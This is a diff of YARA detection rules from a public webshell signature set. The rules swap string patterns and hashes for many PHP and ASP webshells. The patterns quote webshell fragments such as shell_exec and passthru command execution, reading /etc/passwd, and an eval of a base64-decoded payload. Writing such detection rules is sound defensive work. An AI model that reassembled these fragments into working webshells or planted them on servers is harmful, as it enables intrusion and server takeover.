-		$s0 = "$res = mssql_query(\"select * from r57_temp_table\",$db);" fullword
-		$s2 = "'eng_text30'=>'Cat file'," fullword
-		$s3 = "@mssql_query(\"drop table r57_temp_table\",$db);" fullword
+		$s0 = "$info .= '[~]Server: ' .$_SERVER['HTTP_HOST'] .'<br />';" fullword
+		$s4 = "header ( \"Content-Description: Download manager\" );" fullword
+		$s5 = "print \"<center>[ Generation time: \".round(getTime()-startTime,4).\" second"
+		$s9 = "if (mkdir($_POST['dir'], 0777) == false) {" fullword
+		$s12 = "$ret = shellexec($command);" fullword
 
 	condition:
-		1 of them
+		2 of them
 }
-rule SIGNATURE_BASE__Nixrem_Php_Php_C99Shell_V1_0_Php_Php_C99Php_NIX_REMOTE_WEB_SHELL_V_0_5_Alpha_Lite_Public_Version_Php
+rule SIGNATURE_BASE_Webshell_Casus_1_5
 {
 	meta:
-		description = "Semi-Auto-generated "
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "ce88027c-ae08-59f3-948d-6f3d58515468"
+		description = "PHP Webshells Github Archive - file CasuS 1.5.php"
+		author = "Florian Roth (Nextron Systems)"
+		id = "cf89d8f8-d498-57fe-98eb-a98350db182f"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L5520-L5537"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L6725-L6738"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "f7575db2c8f147d03d5b93b431d1a73c4182b5db6e801e672914778b2042a712"
+		hash = "7eee8882ad9b940407acc0146db018c302696341"
+		logic_hash = "0dbaa39bd33047d24e5bc9716108c5581da3f54e93d90f9c550b3d84de1ebfe2"
 		score = 75
 		quality = 85
 		tags = ""
-		super_rule = 1
-		hash0 = "40a3e86a63d3d7f063a86aab5b5f92c6"
-		hash1 = "d8ae5819a0a2349ec552cbcf3a62c975"
-		hash2 = "9e9ae0332ada9c3797d6cee92c2ede62"
-		hash3 = "f3ca29b7999643507081caab926e2e74"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "$num = $nixpasswd + $nixpwdperpage;" fullword
-		$s1 = "$ret = posix_kill($pid,$sig);" fullword
-		$s2 = "if ($uid) {echo join(\":\",$uid).\"<br>\";}" fullword
-		$s3 = "$i = $nixpasswd;" fullword
+		$s2 = "<font size='+1'color='#0000FF'><u>CasuS 1.5'in URL'si</u>: http://$HTTP_HO"
+		$s8 = "$fonk_kap = get_cfg_var(\"fonksiyonlary_kapat\");" fullword
+		$s18 = "if (file_exists(\"F:\\\\\")){" fullword
 
 	condition:
-		2 of them
+		1 of them
 }
-rule SIGNATURE_BASE_Darksecurityteam_Webshell
+rule SIGNATURE_BASE_Webshell_Ftpsearch
 {
 	meta:
-		description = "Dark Security Team Webshell"
+		description = "PHP Webshells Github Archive - file ftpsearch.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "78dcd62f-9215-5571-a5ef-5f811ce9672f"
+		id = "9db8f00a-1843-5057-b8c7-a7f7b63e0659"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L5541-L5553"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L6739-L6753"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "f1c95b13a71ca3629a0bb79601fcacf57cdfcf768806a71b26f2448f8c1d5d24"
-		logic_hash = "0c58ed8845cb04d785322b280647d424e1028a3be7e92b2493fd907fae36b16d"
-		score = 50
+		hash = "c945f597552ccb8c0309ad6d2831c8cabdf4e2d6"
+		logic_hash = "6b32553be4fdf26776e3cbb8a5d4d011d88f2bd50949b65934df72b89065aeec"
+		score = 75
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "form method=post><input type=hidden name=\"\"#\"\" value=Execute(Session(\"\"#\"\"))><input name=thePath value=\"\"\"&HtmlEncode(Server.MapPath(\".\"))&" ascii
+		$s0 = "echo \"[-] Error : coudn't read /etc/passwd\";" fullword
+		$s9 = "@$ftp=ftp_connect('127.0.0.1');" fullword
+		$s12 = "echo \"<title>Edited By KingDefacer</title><body>\";" fullword
+		$s19 = "echo \"[+] Founded \".sizeof($users).\" entrys in /etc/passwd\\n\";" fullword
 
 	condition:
-		1 of them
+		2 of them
 }
-rule SIGNATURE_BASE_PHP_Cloaked_Webshell_Superfetchexec
+rule SIGNATURE_BASE_Webshell__Cyber_Shell_Cybershell_Cyber_Shell__V_1_0_
 {
 	meta:
-		description = "Looks like a webshell cloaked as GIF - http://goo.gl/xFvioC"
+		description = "PHP Webshells Github Archive - from files Cyber Shell.php, cybershell.php, Cyber Shell (v 1.0).php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "4611129a-9865-5603-b1ec-7db0058a80d7"
+		id = "79146f25-87b9-5216-af88-4e433bb08b90"
 		date = "2025-03-29"
 		modified = "2025-03-29"
-		reference = "http://goo.gl/xFvioC"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L5555-L5567"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L6754-L6771"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "320b85b1ad39a90578f53c69838b6264af1e6a71c509aefc0986c7f0c77fdae9"
-		score = 50
+		logic_hash = "fc2cf9a25ccc5aa3d9dc287ef9600b065ba9025cfb0a1ccca1bce9120ea03ff4"
+		score = 75
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash0 = "ef7f7c45d26614cea597f2f8e64a85d54630fe38"
+		hash1 = "cabf47b96e3b2c46248f075bdbc46197db28a25f"
+		hash2 = "9e165d4ed95e0501cd9a90155ac60546eb5b1076"
 
 	strings:
-		$s0 = "else{$d.=@chr(($h[$e[$o]]<<4)+($h[$e[++$o]]));}}eval($d);"
+		$s4 = " <a href=\"http://www.cyberlords.net\" target=\"_blank\">Cyber Lords Community</"
+		$s10 = "echo \"<meta http-equiv=Refresh content=\\\"0; url=$PHP_SELF?edit=$nameoffile&sh"
+		$s11 = " *   Coded by Pixcher" fullword
+		$s16 = "<input type=text size=55 name=newfile value=\"$d/newfile.php\">" fullword
 
 	condition:
-		$s0
+		2 of them
 }
-rule SIGNATURE_BASE_Webshell_Remexp_Asp_Php
+rule SIGNATURE_BASE_Webshell__Ajax_PHP_Command_Shell_Ajax_PHP_Command_Shell_Soldierofallah
 {
 	meta:
-		description = "PHP Webshells Github Archive - file RemExp.asp.php.txt"
+		description = "PHP Webshells Github Archive - from files Ajax_PHP Command Shell.php, Ajax_PHP_Command_Shell.php, soldierofallah.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "274c8816-2711-5f12-937e-549ec2d57ce1"
+		id = "a158d158-d48d-514c-8b7b-4b6a4a10d021"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L5571-L5586"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L6772-L6792"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "d9919dcf94a70d5180650de8b81669fa1c10c5a2"
-		logic_hash = "b3cfa44898629ffa20630436ae10a94ad72f0e793d61e1157a4de649aa048fe2"
+		logic_hash = "0b9e0d96c8a618a4883235e8c5c9a03a1e0b586cb4b30e0273e24c35ee5ee502"
 		score = 75
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash0 = "fa11deaee821ca3de7ad1caafa2a585ee1bc8d82"
+		hash1 = "c0a4ba3e834fb63e0a220a43caaf55c654f97429"
+		hash2 = "16fa789b20409c1f2ffec74484a30d0491904064"
 
 	strings:
-		$s0 = "lsExt = Right(FileName, Len(FileName) - liCount)" fullword
-		$s7 = "<td bgcolor=\"<%=BgColor%>\" title=\"<%=File.Name%>\"> <a href= \"showcode.asp?f"
-		$s13 = "Response.Write Drive.ShareName & \" [share]\"" fullword
-		$s19 = "If Request.QueryString(\"CopyFile\") <> \"\" Then" fullword
-		$s20 = "<td width=\"40%\" height=\"20\" bgcolor=\"silver\">  Name</td>" fullword
+		$s1 = "'Read /etc/passwd' => \"runcommand('etcpasswdfile','GET')\"," fullword
+		$s2 = "'Running processes' => \"runcommand('ps -aux','GET')\"," fullword
+		$s3 = "$dt = $_POST['filecontent'];" fullword
+		$s4 = "'Open ports' => \"runcommand('netstat -an | grep -i listen','GET')\"," fullword
+		$s6 = "print \"Sorry, none of the command functions works.\";" fullword
+		$s11 = "document.cmdform.command.value='';" fullword
+		$s12 = "elseif(isset($_GET['savefile']) && !empty($_POST['filetosave']) && !empty($_POST"
 
 	condition:
-		all of them
+		3 of them
 }
-rule SIGNATURE_BASE_Webshell_Dc3_Security_Crew_Shell_Priv
+rule SIGNATURE_BASE_Webshell_Generic_PHP_7
 {
 	meta:
-		description = "PHP Webshells Github Archive - file dC3_Security_Crew_Shell_PRiV.php"
+		description = "PHP Webshells Github Archive"
 		author = "Florian Roth (Nextron Systems)"
-		id = "c83bb4ba-6b4e-5a88-925b-b93d08b304e4"
+		id = "506373d6-31b4-5a14-b009-f2b43028a98b"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L5587-L5603"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L6793-L6811"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "1b2a4a7174ca170b4e3a8cdf4814c92695134c8a"
-		logic_hash = "f93a5d87d4a490844de578067dc0b7bac6b01ceb9130cd7c70a227566e18f16c"
+		logic_hash = "9d9b6b1333f2061c357fad110b5cc508288c70aea1212aa2fcbf283a2ce4fb2c"
 		score = 75
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash0 = "de98f890790756f226f597489844eb3e53a867a9"
+		hash1 = "128988c8ef5294d51c908690d27f69dffad4e42e"
+		hash2 = "fd64f2bf77df8bcf4d161ec125fa5c3695fe1267"
+		hash3 = "715f17e286416724e90113feab914c707a26d456"
 
 	strings:
-		$s0 = "@rmdir($_GET['file']) or die (\"[-]Error deleting dir!\");" fullword
-		$s4 = "$ps=str_replace(\"\\\\\",\"/\",getenv('DOCUMENT_ROOT'));" fullword
-		$s5 = "header(\"Expires: \".date(\"r\",mktime(0,0,0,1,1,2030)));" fullword
-		$s15 = "search_file($_POST['search'],urldecode($_POST['dir']));" fullword
-		$s16 = "echo base64_decode($images[$_GET['pic']]);" fullword
-		$s20 = "if (isset($_GET['rename_all'])) {" fullword
+		$s0 = "header(\"Content-disposition: filename=$filename.sql\");" fullword
+		$s1 = "else if( $action == \"dumpTable\" || $action == \"dumpDB\" ) {" fullword
+		$s2 = "echo \"<font color=blue>[$USERNAME]</font> - \\n\";" fullword
+		$s4 = "if( $action == \"dumpTable\" )" fullword
 
 	condition:
-		3 of them
+		2 of them
 }
-rule SIGNATURE_BASE_Webshell_Simattacker
+rule SIGNATURE_BASE_Webshell__Small_Web_Shell_By_Zaco_Small_Zaco_Zacosmall
 {
 	meta:
-		description = "PHP Webshells Github Archive - file simattacker.php"
+		description = "PHP Webshells Github Archive - from files Small Web Shell by ZaCo.php, small.php, zaco.php, zacosmall.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "2408fad8-780f-50de-a309-99d14a1d87b6"
+		id = "99dbcea6-7208-5bbe-b200-9ea3074d7855"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L5604-L5622"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L6812-L6830"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "258297b62aeaf4650ce04642ad5f19be25ec29c9"
-		logic_hash = "323b68f1d31df647775ad16a85b9f90bce4eac89188160a1e4853f8fec680160"
+		logic_hash = "840c58043e39014e90e7621c1d2417d5a970c744560738abc4fea3db3cbb8d5a"
 		score = 75
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash0 = "b148ead15d34a55771894424ace2a92983351dda"
+		hash1 = "e4ba288f6d46dc77b403adf7d411a280601c635b"
+		hash2 = "e5713d6d231c844011e9a74175a77e8eb835c856"
+		hash3 = "1b836517164c18caf2c92ee2a06c645e26936a0c"
 
 	strings:
-		$s1 = "$from = rand (71,1020000000).\"@\".\"Attacker.com\";" fullword
-		$s4 = "&nbsp;Turkish Hackers : WWW.ALTURKS.COM <br>" fullword
-		$s5 = "&nbsp;Programer : SimAttacker - Edited By KingDefacer<br>" fullword
-		$s6 = "//fake mail = Use victim server 4 DOS - fake mail " fullword
-		$s10 = "&nbsp;e-mail : kingdefacer@msn.com<br>" fullword
-		$s17 = "error_reporting(E_ERROR | E_WARNING | E_PARSE);" fullword
-		$s18 = "echo \"<font size='1' color='#999999'>Dont in windows\";" fullword
-		$s20 = "$Comments=$_POST['Comments'];" fullword
+		$s2 = "if(!$result2)$dump_file.='#error table '.$rows[0];" fullword
+		$s4 = "if(!(@mysql_select_db($db_dump,$mysql_link)))echo('DB error');" fullword
+		$s6 = "header('Content-Length: '.strlen($dump_file).\"\\n\");" fullword
+		$s20 = "echo('Dump for '.$db_dump.' now in '.$to_file);" fullword
 
 	condition:
 		2 of them
 }
-rule SIGNATURE_BASE_Webshell_Dtool_Pro
+rule SIGNATURE_BASE_Webshell_Generic_PHP_8
 {
 	meta:
-		description = "PHP Webshells Github Archive - file DTool Pro.php"
+		description = "PHP Webshells Github Archive"
 		author = "Florian Roth (Nextron Systems)"
-		id = "9f2922d1-b2af-58ae-b194-ecb33577effa"
+		id = "40c6f69f-9963-5e4f-af44-041d47738519"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L5623-L5641"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L6831-L6850"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "e2ee1c7ba7b05994f65710b7bbf935954f2c3353"
-		logic_hash = "da744efb521415fb8817c0982d8d538e1e38b1c0995f43716611df37bf371c38"
+		logic_hash = "346df2686c4d43b3210b07a30845477e057602500e67baba69b50c41e8d501fa"
 		score = 75
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash0 = "fc1ae242b926d70e32cdb08bbe92628bc5bd7f99"
+		hash1 = "9ad55629c4576e5a31dd845012d13a08f1c1f14e"
+		hash2 = "c4aa2cf665c784553740c3702c3bfcb5d7af65a3"
 
 	strings:
-		$s1 = "function PHPget(){inclVar(); if(confirm(\"O PHPget agora oferece uma lista pront"
-		$s2 = "<font size=3>by r3v3ng4ns - revengans@gmail.com </font>" fullword
-		$s3 = "function PHPwriter(){inclVar();var url=prompt(\"[ PHPwriter ] by r3v3ng4ns\\nDig"
-		$s11 = "//Turns the 'ls' command more usefull, showing it as it looks in the shell" fullword
-		$s13 = "if (@file_exists(\"/usr/bin/wget\")) $pro3=\"<i>wget</i> at /usr/bin/wget, \";" fullword
-		$s14 = "//To keep the changes in the url, when using the 'GET' way to send php variables" fullword
-		$s16 = "function PHPf(){inclVar();var o=prompt(\"[ PHPfilEditor ] by r3v3ng4ns\\nDigite "
-		$s18 = "if(empty($fu)) $fu = @$_GET['fu'];" fullword
+		$s1 = "elseif ( $cmd==\"file\" ) { /* <!-- View a file in text --> */" fullword
+		$s2 = "elseif ( $cmd==\"upload\" ) { /* <!-- Upload File form --> */ " fullword
+		$s3 = "/* I added this to ensure the script will run correctly..." fullword
+		$s14 = "<!--    </form>   -->" fullword
+		$s15 = "<form action=\\\"$SFileName?$urlAdd\\\" method=\\\"POST\\\">" fullword
+		$s20 = "elseif ( $cmd==\"downl\" ) { /*<!-- Save the edited file back to a file --> */" fullword
 
 	condition:
 		3 of them
 }
-rule SIGNATURE_BASE_Webshell_Ironshell_4
+rule SIGNATURE_BASE_Webshell__PH_Vayv_Phvayv_PH_Vayv_Klasvayv_Asp_Php
 {
 	meta:
-		description = "PHP Webshells Github Archive - file ironshell.php"
+		description = "PHP Webshells Github Archive - from files PH Vayv.php, PHVayv.php, PH_Vayv.php, klasvayv.asp.php.txt"
 		author = "Florian Roth (Nextron Systems)"
-		id = "06e87e02-372b-5d4e-be52-5515a068665b"
+		id = "1575591b-3245-5c3d-b2a4-6def89e77032"
 		date = "2025-03-29"
 		modified = "2025-03-29"
-		old_rule_name = "WebShell_ironshell"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L5642-L5661"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L6851-L6869"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "d47b8ba98ea8061404defc6b3a30839c4444a262"
-		logic_hash = "1810071f261ad7390532b07ef24115726f236131aa8ffd29adbde9ebe5085e9d"
+		logic_hash = "42959ba1e3c0f7f198f953e98b9df87059999f5526df4338c109828d0a5a518a"
 		score = 75
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash0 = "b51962a1ffa460ec793317571fc2f46042fd13ee"
+		hash1 = "408ac9ca3d435c0f78bda370b33e84ba25afc357"
+		hash2 = "4003ae289e3ae036755976f8d2407c9381ff5653"
+		hash3 = "4f83bc2836601225a115b5ad54496428a507a361"
 
 	strings:
-		$s0 = "<title>'.getenv(\"HTTP_HOST\").' ~ Shell I</title>" fullword
-		$s2 = "$link = mysql_connect($_POST['host'], $_POST['username'], $_POST"
-		$s4 = "error_reporting(0); //If there is an error, we'll show it, k?" fullword
-		$s8 = "print \"<form action=\\\"\".$me.\"?p=chmod&file=\".$content.\"&d"
-		$s15 = "if(!is_numeric($_POST['timelimit']))" fullword
-		$s16 = "if($_POST['chars'] == \"9999\")" fullword
-		$s17 = "<option value=\\\"az\\\">a - zzzzz</option>" fullword
-		$s18 = "print shell_exec($command);" fullword
+		$s1 = "<font color=\"#000000\">Sil</font></a></font></td>" fullword
+		$s5 = "<td width=\"122\" height=\"17\" bgcolor=\"#9F9F9F\">" fullword
+		$s6 = "onfocus=\"if (this.value == 'Kullan" fullword
+		$s16 = "<img border=\"0\" src=\"http://www.aventgrup.net/arsiv/klasvayv/1.0/2.gif\">"
 
 	condition:
-		3 of them
+		2 of them
 }
-rule SIGNATURE_BASE_Webshell_Indexer_Asp_Php
+rule SIGNATURE_BASE_Webshell_Generic_PHP_9
 {
 	meta:
-		description = "PHP Webshells Github Archive - file indexer.asp.php.txt"
+		description = "PHP Webshells Github Archive - from files KAdot Universal Shell v0.1.6.php, KAdot_Universal_Shell_v0.1.6.php, KA_uShell 0.1.6.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "d6e17429-1b58-5a1b-846d-f5dbfd74cf3a"
-		date = "2025-03-29"
-		modified = "2025-03-29"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L5662-L5678"
+		id = "98927127-08be-57ac-a090-38c7e614dae7"
+		date = "2014-04-06"
+		modified = "2022-12-06"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L6871-L6891"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "e9a7aa5eb1fb228117dc85298c7d3ecd8e288a2d"
-		logic_hash = "c576925c95b5bd2549e8039a1fc6ac228bfab5ddee8c4e12264ea78e9828ba5c"
-		score = 75
-		quality = 85
+		logic_hash = "9f8768f609ccd464f7c2b9d10ce8ea423355e11b05b39e629e5e3de0787e212b"
+		score = 70
+		quality = 77
 		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash0 = "89f2a7007a2cd411e0a7abd2ff5218d212b84d18"
+		hash1 = "2266178ad4eb72c2386c0a4d536e5d82bb7ed6a2"
+		hash2 = "0daed818cac548324ad0c5905476deef9523ad73"
 
 	strings:
-		$s0 = "<meta http-equiv=\"Content-Language\" content=\"tr\">" fullword
-		$s1 = "<title>WwW.SaNaLTeRoR.OrG - inDEXER And ReaDer</title>" fullword
-		$s2 = "<form action=\"?Gonder\" method=\"post\">" fullword
-		$s4 = "<form action=\"?oku\" method=\"post\">" fullword
-		$s7 = "var message=\"SaNaLTeRoR - " fullword
-		$s8 = "nDexEr - Reader\"" fullword
+		$ = { 3a 3c 62 3e 22 20 2e 62 61 73 65 36 34 5f 64 65 63 6f 64 65 28 24 5f 50 4f 53 54 5b 27 74 6f 74 27 5d 29 2e 20 22 3c 2f 62 3e 22 3b }
+		$ = { 69 66 20 28 69 73 73 65 74 28 24 5f 50 4f 53 54 5b 27 77 71 27 5d 29 20 26 26 20 24 5f 50 4f 53 54 5b 27 77 71 27 5d 3c 3e 22 22 29 20 7b }
+		$ = { 70 61 73 73 74 68 72 75 28 24 5f 50 4f 53 54 5b 27 63 27 5d 29 3b }
+		$ = { 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 72 61 64 69 6f 22 20 6e 61 6d 65 3d 22 74 61 63 22 20 76 61 6c 75 65 3d 22 31 22 3e 42 36 34 20 44 65 63 6f 64 65 3c 62 72 3e }
 
 	condition:
-		3 of them
+		1 of them
 }
-rule SIGNATURE_BASE_Webshell_Toolaspshell
+rule SIGNATURE_BASE_Webshell__PH_Vayv_Phvayv_PH_Vayv
 {
 	meta:
-		description = "PHP Webshells Github Archive - file toolaspshell.php"
+		description = "PHP Webshells Github Archive - from files PH Vayv.php, PHVayv.php, PH_Vayv.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "016af030-4991-583c-aab5-a2933ae0eeec"
+		id = "1575591b-3245-5c3d-b2a4-6def89e77032"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L5679-L5692"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L6893-L6909"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "11d236b0d1c2da30828ffd2f393dd4c6a1022e3f"
-		logic_hash = "cb46d3170a9c144a22ef8c91b381495a471d2aa178a4a123eb9a1e32e1db7683"
+		logic_hash = "b2f2b95415bc990adac38eada20cbc793f286d51f2054bc969e9c667f16717f9"
 		score = 75
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash0 = "b51962a1ffa460ec793317571fc2f46042fd13ee"
+		hash1 = "408ac9ca3d435c0f78bda370b33e84ba25afc357"
+		hash2 = "4003ae289e3ae036755976f8d2407c9381ff5653"
 
 	strings:
-		$s0 = "cprthtml = \"<font face='arial' size='1'>RHTOOLS 1.5 BETA(PVT) Edited By KingDef"
-		$s12 = "barrapos = CInt(InstrRev(Left(raiz,Len(raiz) - 1),\"\\\")) - 1" fullword
-		$s20 = "destino3 = folderItem.path & \"\\index.asp\"" fullword
+		$s4 = "<form method=\"POST\" action=\"<?echo \"PHVayv.php?duzkaydet=$dizin/$duzenle"
+		$s12 = "<? if ($ekinci==\".\" or  $ekinci==\"..\") {" fullword
+		$s17 = "name=\"duzenx2\" value=\"Klas" fullword
 
 	condition:
 		2 of them
 }
-rule SIGNATURE_BASE_Webshell_B374K_Mini_Shell_Php_Php
+rule SIGNATURE_BASE_Webshell_Generic_PHP_1
 {
 	meta:
-		description = "PHP Webshells Github Archive - file b374k-mini-shell-php.php.php"
+		description = "PHP Webshells Github Archive - from files Dive Shell 1.0"
 		author = "Florian Roth (Nextron Systems)"
-		id = "d5b0dfa5-46b5-5323-a8e8-b119d8c2c8e5"
-		date = "2025-03-29"
-		modified = "2025-03-29"
+		id = "9a87038b-3f78-5b9a-a209-c9026d83363f"
+		date = "2014-04-06"
+		modified = "2022-12-06"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L5693-L5706"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L6911-L6930"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "afb88635fbdd9ebe86b650cc220d3012a8c35143"
-		logic_hash = "553bd775d9662f9410d9ab946ccffe4b2ee92e367bcc6345fa595527653280cf"
-		score = 75
-		quality = 85
+		logic_hash = "9e3759d45d13e33481b962c4b59a019647a3e80bdd3885c4404169af74288b89"
+		score = 70
+		quality = 79
 		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash0 = "3b086b9b53cf9d25ff0d30b1d41bb2f45c7cda2b"
+		hash1 = "2558e728184b8efcdb57cfab918d95b06d45de04"
+		hash2 = "203a8021192531d454efbc98a3bbb8cabe09c85c"
+		hash3 = "b79709eb7801a28d02919c41cc75ac695884db27"
 
 	strings:
-		$s0 = "@error_reporting(0);" fullword
-		$s2 = "@eval(gzinflate(base64_decode($code)));" fullword
-		$s3 = "@set_time_limit(0); " fullword
+		$ = { 76 61 72 20 63 6f 6d 6d 61 6e 64 5f 68 69 73 74 20 3d 20 6e 65 77 20 41 72 72 61 79 28 3c 3f 70 68 70 20 65 63 68 6f 20 24 6a 73 5f 63 6f 6d 6d 61 6e 64 5f 68 69 73 74 20 3f 3e 29 3b }
+		$ = { 69 66 20 28 65 6d 70 74 79 28 24 5f 53 45 53 53 49 4f 4e 5b 27 63 77 64 27 5d 29 20 7c 7c 20 21 65 6d 70 74 79 28 24 5f 52 45 51 55 45 53 54 5b 27 72 65 73 65 74 27 5d 29 29 20 7b }
+		$ = { 69 66 20 28 65 2e 6b 65 79 43 6f 64 65 20 3d 3d 20 33 38 20 26 26 20 63 75 72 72 65 6e 74 5f 6c 69 6e 65 20 3c 20 63 6f 6d 6d 61 6e 64 5f 68 69 73 74 2e 6c 65 6e 67 74 68 2d 31 29 20 7b }
 
 	condition:
-		all of them
+		1 of them
 }
-rule SIGNATURE_BASE_Webshell_Sincap_1_0
+rule SIGNATURE_BASE_Webshell_Generic_PHP_2
 {
 	meta:
-		description = "PHP Webshells Github Archive - file Sincap 1.0.php"
+		description = "PHP Webshells Github Archive - from files CrystalShell v.1.php, load_shell.php, Loaderz WEB Shell.php, stres.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "38d39739-660f-596d-a297-1f0dfe530797"
+		id = "be335331-34d7-5abc-b29b-eac7a5ec3915"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L5707-L5722"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L6932-L6951"
